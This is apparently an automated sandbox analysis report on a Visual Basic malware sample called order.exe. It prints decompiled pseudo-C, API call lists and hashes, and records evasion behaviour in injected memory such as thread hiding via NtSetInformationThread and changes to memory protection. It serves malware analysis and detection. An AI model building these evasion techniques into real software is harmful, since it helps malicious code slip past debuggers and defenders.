                                  			E00411F7B(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				char _v48;
				signed int _v52;
				signed int _v64;
				signed int _t31;
				char* _t32;
				signed int _t34;
				void* _t38;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t38 = __edx;
				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x401488;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x28,  *[fs:0x0], 0x4014f6, _t41);
				_t31 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
				asm("fclex");
				_v52 = _t31;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x402564);
					_push(_a4);
					_push(_v52);
					L004016B2();
					_v64 = _t31;
				}
				_push(0);
				_push(5);
				_push(_v32);
				_t32 =  &_v48;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L004015D4();
				asm("cdq");
				_t34 = _t32 - _t38 >> 1;
				_v28 = _t34;
				L004016AC();
				L0040167C();
				_push(0x412040);
				return _t34;
			}


















                                  0x00411f7b
                                  0x00411f7e
                                  0x00411f8d
                                  0x00411f97
                                  0x00411f9f
                                  0x00411fa2
                                  0x00411fa9
                                  0x00411fb8
                                  0x00411fc7
                                  0x00411fcd
                                  0x00411fcf
                                  0x00411fd6
                                  0x00411ff2
                                  0x00411fd8
                                  0x00411fd8
                                  0x00411fdd
                                  0x00411fe2
                                  0x00411fe5
                                  0x00411fe8
                                  0x00411fed
                                  0x00411fed
                                  0x00411ff6
                                  0x00411ff8
                                  0x00411ffa
                                  0x00411ffd
                                  0x00412000
                                  0x00412001
                                  0x00412009
                                  0x0041200a
                                  0x0041200f
                                  0x00412012
                                  0x00412014
                                  0x0041201a
                                  0x00412022
                                  0x00412027
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411F97
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401488,00402564,00000160), ref: 00411FE8
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00412001
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041200A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041201A
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00412022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 9cbe185d29236a0d4635fa7f64b1206cf8eab112ff7922d958a21b589507b877
                                  • Instruction ID: 6b4ee09fcba28413492df4775673d8b3ebb8dae30b3a3db6fafe167abea2068f
                                  • Opcode Fuzzy Hash: 9cbe185d29236a0d4635fa7f64b1206cf8eab112ff7922d958a21b589507b877
                                  • Instruction Fuzzy Hash: C5114C75D00209BFCB00AFA5CC49FDEBBB8BF08704F10842AF504B71A1DBB9A5458B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FFB9, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E0040FFB9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v36;
				char _v52;
				signed int _v56;
				signed int _v68;
				signed int _t31;
				char* _t32;
				intOrPtr _t33;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L004014F0();
				_v16 = _t42;
				_v12 = 0x4012b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4014f6, _t39);
				_t31 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v36);
				asm("fclex");
				_v56 = _t31;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x402564);
					_push(_a4);
					_push(_v56);
					L004016B2();
					_v68 = _t31;
				}
				_push(0);
				_push(3);
				_push(_v36);
				_t32 =  &_v52;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L00401670();
				_t33 = _t32;
				_v28 = _t33;
				L004016AC();
				L0040167C();
				_push(0x41007c);
				return _t33;
			}

















                                  0x0040ffbc
                                  0x0040ffcb
                                  0x0040ffd5
                                  0x0040ffdd
                                  0x0040ffe0
                                  0x0040ffe7
                                  0x0040fff6
                                  0x00410005
                                  0x0041000b
                                  0x0041000d
                                  0x00410014
                                  0x00410030
                                  0x00410016
                                  0x00410016
                                  0x0041001b
                                  0x00410020
                                  0x00410023
                                  0x00410026
                                  0x0041002b
                                  0x0041002b
                                  0x00410034
                                  0x00410036
                                  0x00410038
                                  0x0041003b
                                  0x0041003e
                                  0x0041003f
                                  0x00410047
                                  0x00410048
                                  0x0041004d
                                  0x00410050
                                  0x00410056
                                  0x0041005e
                                  0x00410063
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FFD5
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004012B0,00402564,00000160), ref: 00410026
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000003,00000000), ref: 0041003F
                                  • __vbaI2Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00410048
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 00410056
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041005E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 81404f22fb8db28a3dbf38d74a9f513be638583b52f85cef710bbefe2b6526ff
                                  • Instruction ID: cf95c35f1a17da434eb8fd931cd2d08015c7ad43b84c04415380aba1e2abeacd
                                  • Opcode Fuzzy Hash: 81404f22fb8db28a3dbf38d74a9f513be638583b52f85cef710bbefe2b6526ff
                                  • Instruction Fuzzy Hash: 5511F974900218FFCB01EFA5DD49FDE7BB5BB08744F10446AF504BB1A1D7796A418B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004125BE, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004125BE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				short _v60;
				char* _t24;
				short _t25;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t38 = _t37 - 0xc;
				 *[fs:0x0] = _t38;
				L004014F0();
				_v16 = _t38;
				_v12 = 0x4014c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4014f6, _t35);
				_v48 = _a4;
				_v56 = 9;
				L00401634();
				_t24 =  &_v40;
				_push(_t24);
				L0040163A();
				_v60 =  ~(0 | _t24 != 0x0000ffff);
				L0040167C();
				_t25 = _v60;
				if(_t25 != 0) {
					_push(0xf);
					L0040162E();
				}
				_push(0x412656);
				return _t25;
			}















                                  0x004125c1
                                  0x004125d0
                                  0x004125da
                                  0x004125e2
                                  0x004125e5
                                  0x004125ec
                                  0x004125fb
                                  0x00412601
                                  0x00412604
                                  0x00412611
                                  0x00412616
                                  0x00412619
                                  0x0041261a
                                  0x0041262a
                                  0x00412631
                                  0x00412636
                                  0x0041263c
                                  0x0041263e
                                  0x00412640
                                  0x00412640
                                  0x00412645
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$#562#570ChkstkFree
                                  • String ID:
                                  • API String ID: 3756826682-0
                                  • Opcode ID: 83a4fedb5a8bd05c452d610ca1a8ae2dfd07405c6067e479ac3bd64601c103f3
                                  • Instruction ID: ce7be8fef53c248a746c8bb577d09f22fc67f8e7144f37e2106bd447d45646b1
                                  • Opcode Fuzzy Hash: 83a4fedb5a8bd05c452d610ca1a8ae2dfd07405c6067e479ac3bd64601c103f3
                                  • Instruction Fuzzy Hash: 46014074900249ABCB00EFA5D945BDDBBB4EF08B44F10842AF404F72E1D7799A45DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FE36, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040FE36(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t26;
				intOrPtr _t28;

				 *[fs:0x0] = _t28;
				L004014F0();
				_v16 = _t28;
				_v12 = 0x401288;
				_v8 = 0;
				_t16 =  *((intOrPtr*)( *_a4 + 4))(_a4, _t24, _t26, _t21, 0x18,  *[fs:0x0], 0x4014f6);
				_push(0x402b8c);
				_push(0x402b8c);
				L00401694();
				if(_t16 != 0) {
					_push(L"smartish");
					_push(0x36);
					_push(0xffffffff);
					_push(0x20);
					L0040168E();
				}
				 *((intOrPtr*)( *_a4 + 8))(_a4);
				 *[fs:0x0] = _v24;
				return _v8;
			}












                                  0x0040fe48
                                  0x0040fe52
                                  0x0040fe5a
                                  0x0040fe5d
                                  0x0040fe64
                                  0x0040fe73
                                  0x0040fe76
                                  0x0040fe7b
                                  0x0040fe80
                                  0x0040fe87
                                  0x0040fe89
                                  0x0040fe8e
                                  0x0040fe90
                                  0x0040fe92
                                  0x0040fe94
                                  0x0040fe94
                                  0x0040fea1
                                  0x0040feaa
                                  0x0040feb5

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FE52
                                  • __vbaStrCmp.MSVBVM60(00402B8C,00402B8C,?,?,?,?,004014F6), ref: 0040FE80
                                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000036,smartish,00402B8C,00402B8C,?,?,?,?,004014F6), ref: 0040FE94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$ChkstkFileOpen
                                  • String ID: smartish
                                  • API String ID: 3263042092-151392084
                                  • Opcode ID: 6bcdebe7f3eeddb9f4661ff493a2666627beeae826d07222b753aa28822d917b
                                  • Instruction ID: d901483c21a68f0b142d973e2526e543fcd1ee286319c9e13358bd36dadb9fec
                                  • Opcode Fuzzy Hash: 6bcdebe7f3eeddb9f4661ff493a2666627beeae826d07222b753aa28822d917b
                                  • Instruction Fuzzy Hash: E2011E75640204BBC7109F99C946F4A7BB4EB44B54F10817AF804BB2E1C779A9008A94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004100A3, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E004100A3(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;

				_t37 = _t36 - 0xc;
				 *[fs:0x0] = _t37;
				L004014F0();
				_v16 = _t37;
				_v12 = 0x4012c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4014f6, _t34);
				L004016A6();
				asm("fld1");
				 *_t37 = __fp0;
				_t27 =  *((intOrPtr*)( *_a4 + 0x10c))(_a4,  &_v36);
				asm("fclex");
				_v40 = _t27;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x10c);
					_push(0x402564);
					_push(_a4);
					_push(_v40);
					L004016B2();
					_v52 = _t27;
				}
				asm("wait");
				_push(0x41013a);
				L0040169A();
				return _t27;
			}













                                  0x004100a6
                                  0x004100b5
                                  0x004100bf
                                  0x004100c7
                                  0x004100ca
                                  0x004100d1
                                  0x004100e0
                                  0x004100e9
                                  0x004100ee
                                  0x004100f1
                                  0x004100fc
                                  0x00410102
                                  0x00410104
                                  0x0041010b
                                  0x00410127
                                  0x0041010d
                                  0x0041010d
                                  0x00410112
                                  0x00410117
                                  0x0041011a
                                  0x0041011d
                                  0x00410122
                                  0x00410122
                                  0x0041012b
                                  0x0041012c
                                  0x00410134
                                  0x00410139

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004100BF
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004100E9
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004012C0,00402564,0000010C), ref: 0041011D
                                  • __vbaFreeStr.MSVBVM60(0041013A), ref: 00410134
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkCopyFreeHresult
                                  • String ID:
                                  • API String ID: 3646427762-0
                                  • Opcode ID: 52887fcc10be64088d0b7baf49bc52a0b66fe1505449897282d6acf557df189d
                                  • Instruction ID: ac03ad42070e0bd81513891b1a35633e174746dcec54ee3ee208a639beb9a93c
                                  • Opcode Fuzzy Hash: 52887fcc10be64088d0b7baf49bc52a0b66fe1505449897282d6acf557df189d
                                  • Instruction Fuzzy Hash: 7311E875940208FFCB00EF95C945FDDBBB5FB08744F10856AF445BB2A1C7B959809B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411456, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00411456(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				void* _t34;
				void* _t36;
				intOrPtr _t37;

				_t37 = _t36 - 0xc;
				 *[fs:0x0] = _t37;
				L004014F0();
				_v16 = _t37;
				_v12 = 0x4013c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4014f6, _t34);
				L004016A6();
				_t27 =  *((intOrPtr*)( *_a4 + 0x284))(_a4, 1);
				asm("fclex");
				_v40 = _t27;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x284);
					_push(0x402564);
					_push(_a4);
					_push(_v40);
					L004016B2();
					_v52 = _t27;
				}
				asm("wait");
				_push(0x4114e9);
				L0040169A();
				return _t27;
			}













                                  0x00411459
                                  0x00411468
                                  0x00411472
                                  0x0041147a
                                  0x0041147d
                                  0x00411484
                                  0x00411493
                                  0x0041149c
                                  0x004114ab
                                  0x004114b1
                                  0x004114b3
                                  0x004114ba
                                  0x004114d6
                                  0x004114bc
                                  0x004114bc
                                  0x004114c1
                                  0x004114c6
                                  0x004114c9
                                  0x004114cc
                                  0x004114d1
                                  0x004114d1
                                  0x004114da
                                  0x004114db
                                  0x004114e3
                                  0x004114e8

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411472
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0041149C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004013C8,00402564,00000284), ref: 004114CC
                                  • __vbaFreeStr.MSVBVM60(004114E9), ref: 004114E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkCopyFreeHresult
                                  • String ID:
                                  • API String ID: 3646427762-0
                                  • Opcode ID: c98ec655579ac62ecdd62d29c187864cd95596f99bbca9e2377010f550d22d5d
                                  • Instruction ID: 34bfec27e8eb1dea41cc10b0622536064b2f5ca0e5a683eb174bb6cf1104bee5
                                  • Opcode Fuzzy Hash: c98ec655579ac62ecdd62d29c187864cd95596f99bbca9e2377010f550d22d5d
                                  • Instruction Fuzzy Hash: 9111FA34940209BFCF00EF95C949FDD7BB4BB04744F10846AF8007B2B1D7799A449B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411510, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00411510(intOrPtr* _a4, long long* _a36) {
				long long _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;

				L004014F0();
				_t16 =  *((intOrPtr*)( *_a4 + 0x16c))(_a4, L"HENKASTENDE", 0x10);
				asm("fclex");
				_v16 = _t16;
				if(_v16 >= 0) {
					_v20 = _v20 & 0x00000000;
				} else {
					_push(0x16c);
					_push(0x402564);
					_push(_a4);
					_push(_v16);
					L004016B2();
					_v20 = _t16;
				}
				 *_a36 = _v12;
				return 0;
			}







                                  0x00411516
                                  0x00411528
                                  0x0041152e
                                  0x00411530
                                  0x00411537
                                  0x00411553
                                  0x00411539
                                  0x00411539
                                  0x0041153e
                                  0x00411543
                                  0x00411546
                                  0x00411549
                                  0x0041154e
                                  0x0041154e
                                  0x0041155d
                                  0x00411562

                                  APIs
                                  • __vbaChkstk.MSVBVM60 ref: 00411516
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402564,0000016C), ref: 00411549
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkHresult
                                  • String ID: HENKASTENDE
                                  • API String ID: 1396620058-4238399944
                                  • Opcode ID: a8e1f92007fb7388bc23175b57468ceb7c3c43e0319c5452fca363fa123dc2a3
                                  • Instruction ID: d41281069247f9749fae0bd14f1cf7e9584ca45d9e19afcc66635a70a69df064
                                  • Opcode Fuzzy Hash: a8e1f92007fb7388bc23175b57468ceb7c3c43e0319c5452fca363fa123dc2a3
                                  • Instruction Fuzzy Hash: 53F0FE30900608BFCB00AF55DC09BDE7BB1BF45358F108565F546BB1E1C7B996A09B88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: order.exe PID: 6008 Parent PID: 6752 order.exeCOMMON

                                  Executed Functions

                                  Function 005685C3, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 338nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00568E45: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,005687BE,?,00560914,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00568E5E
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationMemoryProtectThreadVirtual
                                  • String ID: .JtI$.JtI$1.!T$]|$]|
                                  • API String ID: 675431017-3585929087
                                  • Opcode ID: 172bbd0ad2e8b4e1b966d4cccdece53857d0be619b71cd05470ba23bb755ffe8
                                  • Instruction ID: 9eab09c42c9425ad4d14e4f92510d261346a6e617e9f572f3a495ab37d3b2cf4
                                  • Opcode Fuzzy Hash: 172bbd0ad2e8b4e1b966d4cccdece53857d0be619b71cd05470ba23bb755ffe8
                                  • Instruction Fuzzy Hash: 26B16B70604342DFDB20DF6488957B67F91BF66360F64876ADC968B2D2DB31C846CB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005630CA, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 101sleepnativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(00000800,?,00000000,?,00000000,00000000,?,00000000,00000000,00569B9E,00000000,00000000,00000000), ref: 005631FA
                                  • TerminateThread.KERNELBASE(000000FE,00000000), ref: 005632C6
                                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00564804
                                    • Part of subcall function 00563249: CreateThread.KERNELBASE(00000000,00000000,Function_00004532,00000000,00000000,00000000), ref: 0056328A
                                  • Sleep.KERNELBASE(00000005), ref: 005645C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: SleepThread$CreateMemoryProtectTerminateVirtual
                                  • String ID: 8j$jjj$=b$a
                                  • API String ID: 1091447980-1279705719
                                  • Opcode ID: 0ffa6035e48e5da3dbaa1e9b73431c7177fbe8b759c4f95f43b56efb64721467
                                  • Instruction ID: 06ce53bd6e8b491124915c0283ea26c86261e464a139ee2abedbf76975a94618
                                  • Opcode Fuzzy Hash: 0ffa6035e48e5da3dbaa1e9b73431c7177fbe8b759c4f95f43b56efb64721467
                                  • Instruction Fuzzy Hash: C2214870644346EBEF245B108C5AFD53BA1BF52750FE58651EC0A1B4E19374C88BDA53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00560769, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 177nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(00560811,?,00000000,000000D3,?,000021D9,000021D9,00000000,00000004,00000000,00000000,000025D9,000029D9), ref: 005607AB
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 1954852945-4219829001
                                  • Opcode ID: c8d7d8908f1dcfae57959a6e148a544d14df0af275d388700f18a6581e82e1b7
                                  • Instruction ID: f01739b7911ff832e0d7d51fef917032612e238c474612755c33bcbee0b3ef21
                                  • Opcode Fuzzy Hash: c8d7d8908f1dcfae57959a6e148a544d14df0af275d388700f18a6581e82e1b7
                                  • Instruction Fuzzy Hash: 6C41F070604306AFFF10AE705C967FB2F56BF997A0F708A15EC564B1C2D1218C86CA92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00567738, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: 6f0a1e61a3906ea851ebf11171bba3a23fc923ec947f4ff7177bd1d495697bef
                                  • Instruction ID: e7dbfeae014c7e1901e37381a8a60607df8ebbc7b732afb2d5bf6398070585cb
                                  • Opcode Fuzzy Hash: 6f0a1e61a3906ea851ebf11171bba3a23fc923ec947f4ff7177bd1d495697bef
                                  • Instruction Fuzzy Hash: 5051CF706043079FEB109E7488917EB3F52BF997A4F704629EC868B6C2D661CC46D692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00560873, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 156nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: b2d4976bbdf53205fde42ea47dacbadb6ea50dfc4b451fdd7dc5adc9d02703c3
                                  • Instruction ID: 33ff7c066632d1d4f01a22e309335985e3d89358188c3f2e00fe7b166bff2ca8
                                  • Opcode Fuzzy Hash: b2d4976bbdf53205fde42ea47dacbadb6ea50dfc4b451fdd7dc5adc9d02703c3
                                  • Instruction Fuzzy Hash: B641DFB0A043479BFF109E601C827EB3F556B463A0F758B66DC0A1B9C2E1558C6BD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005608C3, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: c064e530671b9e78b6a9bdde3e336a8522ef1af433b1754a77815ad146f8705d
                                  • Instruction ID: 9a2b9ae1731d7a08652c575c61783898ee8fa0496828c6a58b729154466864ff
                                  • Opcode Fuzzy Hash: c064e530671b9e78b6a9bdde3e336a8522ef1af433b1754a77815ad146f8705d
                                  • Instruction Fuzzy Hash: AF31D0B0A0434797FF109D6018827EB3F156B863E4F359B26EC0A179C6E1558C6BDAD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00560856, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00560914,00000000,00000000,00000000,00000000,?), ref: 005609B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T$]|$]|
                                  • API String ID: 4046476035-4219829001
                                  • Opcode ID: a0e48cbcb8c0c73a5e9923c3354c6aa0412b9b86f204e09265f8f7dc1ba36f1c
                                  • Instruction ID: 755d6917b093face20bed29f5ad15d02b5ad312f4454f918ce979a9f9a79ca92
                                  • Opcode Fuzzy Hash: a0e48cbcb8c0c73a5e9923c3354c6aa0412b9b86f204e09265f8f7dc1ba36f1c
                                  • Instruction Fuzzy Hash: C241EE70A04307ABFF10AE701C927EB2F667F993A0F704625EC465B5C2D261CC57CA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0056330B, Relevance: 4.6, APIs: 3, Instructions: 113nativeCOMMON
                                  Download Yara Rule
                                  APIs
